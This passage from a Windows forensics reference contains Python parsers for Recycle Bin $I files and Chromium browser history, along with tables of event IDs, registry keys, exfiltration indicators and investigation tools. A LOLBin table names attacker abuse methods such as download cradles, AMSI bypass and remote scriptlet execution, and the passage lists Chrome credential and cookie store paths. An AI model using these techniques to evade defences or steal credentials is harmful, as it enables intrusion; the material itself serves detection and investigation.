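    else:
        raise ValueError(f"unknown $I version {version}")
    return {"version": version, "original_size": size,
            "deleted": filetime_to_datetime(deleted_ft), "original_path": path}


def r_file_name(i_file_name: str) -> str:
    """$I and $R share the random suffix, so the content file for $IX7K2Q1.rar is $RX7K2Q1.rar."""
    base = ntpath.basename(i_file_name)
    if not base.startswith("$I"):
        raise ValueError(f"not a $I file name: {base}")
    return "$R" + base[2:]


def build_sample_i_file(version: int, path: str, size: int, deleted: datetime) -> bytes:
    """Constructed test data in the on-disk layout described above."""
    header = struct.pack("<QQQ", version, size, datetime_to_filetime(deleted))
    encoded = (path + "\x00").encode("utf-16-le")
    if version == 1:
        return header + encoded.ljust(520, b"\x00")
    return header + struct.pack("<I", len(path) + 1) + encoded


SAMPLE_V2 = build_sample_i_file(2, r"C:\Users\bob\Documents\staging.rar", 1048576,
                                datetime(2024, 6, 1, 8, 30, tzinfo=timezone.utc))
SAMPLE_V1 = build_sample_i_file(1, r"C:\Users\bob\Desktop\notes.txt", 2048,
                                datetime(2016, 2, 3, 4, 5, 6, tzinfo=timezone.utc))

if __name__ == "__main__":
    print(parse_i_file(SAMPLE_V2))
    print(parse_i_file(SAMPLE_V1))
    print(r_file_name(r"C:\$Recycle.Bin\S-1-5-21-1-2-3-1001\$IX7K2Q1.rar"))
```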
LOLBin (Living Off the Land Binary) Reference
| Binary | Common Abuse Method |
|---|---|
| certutil.exe | Download files, base64 decode payloads |
| mshta.exe | Execute remote HTA scripts |
| regsvr32.exe | Squiblydoo — execute remote scriptlets (bypass AppLocker) |
| rundll32.exe | Execute arbitrary DLL exports |
| wscript.exe / cscript.exe | Execute VBScript/JScript payloads |
| powershell.exe | Download cradles, reflective PE loading, AMSI bypass |
| msiexec.exe | Execute remote MSI packages |
| bitsadmin.exe | File download, persistence via BITS jobs |
| wmic.exe | Remote process creation, lateral movement |
| msbuild.exe | Execute inline C# — fileless execution |
Detection: Prefetch entries, Sysmon Event ID 1, Event ID 4688 (with command-line logging enabled)
8. Data Exfiltration Indicators
Staging Activity
| Artifact | Detail |
|---|---|
| Shellbags | Browsing to unusual network shares or external drives |
| $UsnJrnl | Mass file operations (bulk creates/renames in short window) |
| Prefetch | Compression tool execution (rar.exe, 7z.exe, zip.exe) |
| LNK files | Target paths pointing to archive staging directories |
| ATT&CK | T1074.001 |
Archive Utility Activity
| Indicator | Detail |
|---|---|
| Prefetch entries | WinRAR, 7-Zip, tar, compress executions with timestamps |
| AmCache SHA1 | Hash of compression utility for VT lookup |
| Command-line args | -p (password protection), split archive switches |
| ATT&CK | T1560.001 |
Rclone / Cloud Exfiltration
| Indicator | Detail |
|---|---|
| Prefetch | rclone.exe execution |
| BAM/DAM | rclone.exe per-user last execution timestamp |
| Config file | %APPDATA%\rclone\rclone.conf — cloud provider credentials stored in plaintext |
| Sysmon Event ID 3 | Outbound connections to cloud storage API endpoints |
| ATT&CK | T1567.002 |
9. Cloud & Browser Artifacts
Browser History & Downloads
| Browser | Artifact Path |
|---|---|
| Chrome | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History (SQLite) |
| Edge | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History (SQLite) |
| Firefox | %APPDATA%\Mozilla\Firefox\Profiles\*.default\places.sqlite |
| Tool | Hindsight (Chrome), DB Browser for SQLite |
| Key Data | URLs visited, download file paths + timestamps, search terms |
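The two timestamp formats in these databases trip up manual review: Chrome and Edge store microseconds since 1601-01-01 UTC (WebKit time) while Firefox's places.sqlite stores microseconds since the Unix epoch. This added example (not part of this reference, not Hindsight) converts both and reads the urls and downloads tables of a Chromium History file. The in-memory sample database is constructed with a trimmed schema (the real tables carry many more columns; the ones queried here exist in the real schema), and `open_history` assumes the file has already been copied out of the live profile, since Chrome holds it locked while running.

```python
import sqlite3
from datetime import datetime, timedelta, timezone
from pathlib import Path

WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def webkit_to_datetime(us: int) -> datetime:
    """Chrome/Edge: microseconds since 1601-01-01 UTC."""
    return WEBKIT_EPOCH + timedelta(microseconds=us)


def prtime_to_datetime(us: int) -> datetime:
    """Firefox places.sqlite: microseconds since 1970-01-01 UTC."""
    return UNIX_EPOCH + timedelta(microseconds=us)


def datetime_to_webkit(dt: datetime) -> int:
    delta = dt - WEBKIT_EPOCH
    return (delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds


def open_history(path: str) -> sqlite3.Connection:
    """Open a copied History file read-only so the evidence copy is never modified."""
    uri = Path(path).resolve().as_uri() + "?mode=ro"
    return sqlite3.connect(uri, uri=True)


def load_chromium_history(conn: sqlite3.Connection) -> list:
    rows = conn.execute(
        "SELECT url, title, visit_count, last_visit_time FROM urls ORDER BY last_visit_time DESC"
    ).fetchall()
    return [{"url": url, "title": title, "visits": visits, "last_visit": webkit_to_datetime(last)}
            for url, title, visits, last in rows]


def load_chromium_downloads(conn: sqlite3.Connection) -> list:
    rows = conn.execute(
        "SELECT target_path, tab_url, start_time, received_bytes, total_bytes FROM downloads ORDER BY start_time"
    ).fetchall()
    return [{"target_path": target, "source_url": tab_url, "started": webkit_to_datetime(start),
             "received_bytes": received, "total_bytes": total}
            for target, tab_url, start, received, total in rows]


def build_sample_history() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a Chromium History file (schema trimmed to the columns used)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT, visit_count INTEGER,
                          typed_count INTEGER, last_visit_time INTEGER, hidden INTEGER DEFAULT 0);
        CREATE TABLE downloads(id INTEGER PRIMARY KEY, target_path TEXT, tab_url TEXT,
                               start_time INTEGER, received_bytes INTEGER, total_bytes INTEGER);
    """)
    login_time = datetime_to_webkit(datetime(2024, 5, 2, 8, 59, 12, tzinfo=timezone.utc))
    share_time = datetime_to_webkit(datetime(2024, 5, 2, 9, 2, 40, tzinfo=timezone.utc))
    conn.executemany("INSERT INTO urls(url, title, visit_count, typed_count, last_visit_time) VALUES (?,?,?,?,?)", [
        ("https://www.example.com/login", "Sign in", 3, 1, login_time),
        ("https://files.example/share/x.zip", "x.zip", 1, 0, share_time),
    ])
    conn.execute("INSERT INTO downloads(target_path, tab_url, start_time, received_bytes, total_bytes) VALUES (?,?,?,?,?)",
                 (r"C:\Users\bob\Downloads\x.zip", "https://files.example/share/x.zip", share_time, 204800, 204800))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_history()
    for row in load_chromium_history(db):
        print(row["last_visit"].isoformat(), row["visits"], row["url"])
    for dl in load_chromium_downloads(db):
        print(dl["started"].isoformat(), dl["target_path"], "<-", dl["source_url"])
```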
Browser Credentials & Cookies
| Artifact | Path |
|---|---|
| Chrome Cookies | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies |
| Chrome Login Data | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data |
| ATT&CK | T1539 (Session Cookie Theft), T1555.003 |
OneDrive Sync Artifacts
| Artifact | Path |
|---|---|
| Sync logs | %LOCALAPPDATA%\Microsoft\OneDrive\logs\ |
| Settings/DB | %LOCALAPPDATA%\Microsoft\OneDrive\settings\ |
| Key Data | Files synced to cloud, timestamps, account UPN |
10. Key Event Log IDs Reference
Event Log Locations
| Log | Path |
|---|---|
| Security | C:\Windows\System32\winevt\Logs\Security.evtx |
| System | C:\Windows\System32\winevt\Logs\System.evtx |
| Application | C:\Windows\System32\winevt\Logs\Application.evtx |
| Sysmon | C:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx |
| PowerShell | C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx |
| TaskScheduler | C:\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx |
Process Execution
| Event ID | Log | Description |
|---|---|---|
| 4688 | Security | Process created (requires audit policy + CLI logging enabled) |
| 1 | Sysmon | Process created (hash, PPID, full command line) |
| 5 | Sysmon | Process terminated |
| 400/403 | PowerShell | Engine state change |
| 4103 | PowerShell Operational | Module logging |
| 4104 | PowerShell Operational | Script block logging (includes decoded content) |
Object Access
| Event ID | Log | Description |
|---|---|---|
| 4663 | Security | Object access attempt |
| 4656 | Security | Handle to object requested |
| 11 | Sysmon | File created |
| 23 | Sysmon | File deleted (archived to Sysmon archive path) |
Network
| Event ID | Log | Description |
|---|---|---|
| 3 | Sysmon | Network connection initiated |
| 22 | Sysmon | DNS query |
| 5156 | Security | WFP: connection allowed |
| 5157 | Security | WFP: connection blocked |
Registry
| Event ID | Log | Description |
|---|---|---|
| 13 | Sysmon | Registry value set |
| 14 | Sysmon | Registry key/value renamed |
| 4657 | Security | Registry value modified |
11. Critical Registry Keys Reference
| Key | Value |
|---|---|
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | OS version, build number, install date |
| HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName | Hostname |
| HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces | Network interface config |
| HKLM\SYSTEM\MountedDevices | Mounted volumes and drive letters |
Evidence of Execution
| Key | Notes |
|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist | GUI execution (ROT-13 encoded) |
| HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache | ShimCache |
| HKCU\Software\Microsoft\Windows\Shell\MuiCache | Binary friendly name cache |
| HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store | Compat flags set at execution |
User Activity
| Key | Notes |
|---|---|
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | Recently opened files by extension |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU | Files opened/saved via common dialog |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | Commands typed into the Run box |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths | Paths typed directly in Explorer |
Network & Remote Access
| Key | Notes |
|---|---|
| HKCU\Software\Microsoft\Terminal Server Client\Default | RDP connection history (target hostnames) |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles | Network profiles with connection timestamps |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures | Network GUIDs to profile mapping |
12. Recommended Toolchain
Acquisition
| Tool | Use Case |
|---|---|
| KAPE | Targeted triage collection — configurable targets and modules |
| FTK Imager | Full disk image, memory capture, logical acquisition |
| WinPmem / Magnet RAM Capture | Live memory acquisition |
| Velociraptor | Enterprise-scale remote artifact collection |
| CyLR | Lightweight live response artifact collection |
Parsing & Analysis
| Tool | Artifacts Covered |
|---|---|
| Eric Zimmerman Tools | MFT, Prefetch, ShimCache, AmCache, JumpLists, LNK, Registry, Shellbags, $UsnJrnl, Recycle Bin |
| Registry Explorer | All registry hives — full browsing with transaction log integration |
| Volatility3 | Memory forensics — processes, network, injections, malfind |
| Autopsy / FTK | Full case management, file recovery, keyword search |
| Wireshark / NetworkMiner | PCAP analysis, stream reconstruction |
| Hayabusa | Rapid Windows Event Log threat hunting (Sigma-based) |
| Chainsaw | Fast Event Log triage and hunting |
| FLOSS | Automated string extraction from malware |
| PEStudio | Static PE analysis — imports, strings, VT lookup |
| Hindsight | Chrome/Chromium browser artifact parsing |
Quick Investigation Checklists
Suspected Malware Execution
Suspected Lateral Movement
Suspected Exfiltration
Suspected Persistence
Last updated: 2026 | Maintained for sdp4n6.dev | Coverage: Windows 10/11, Server 2016–2022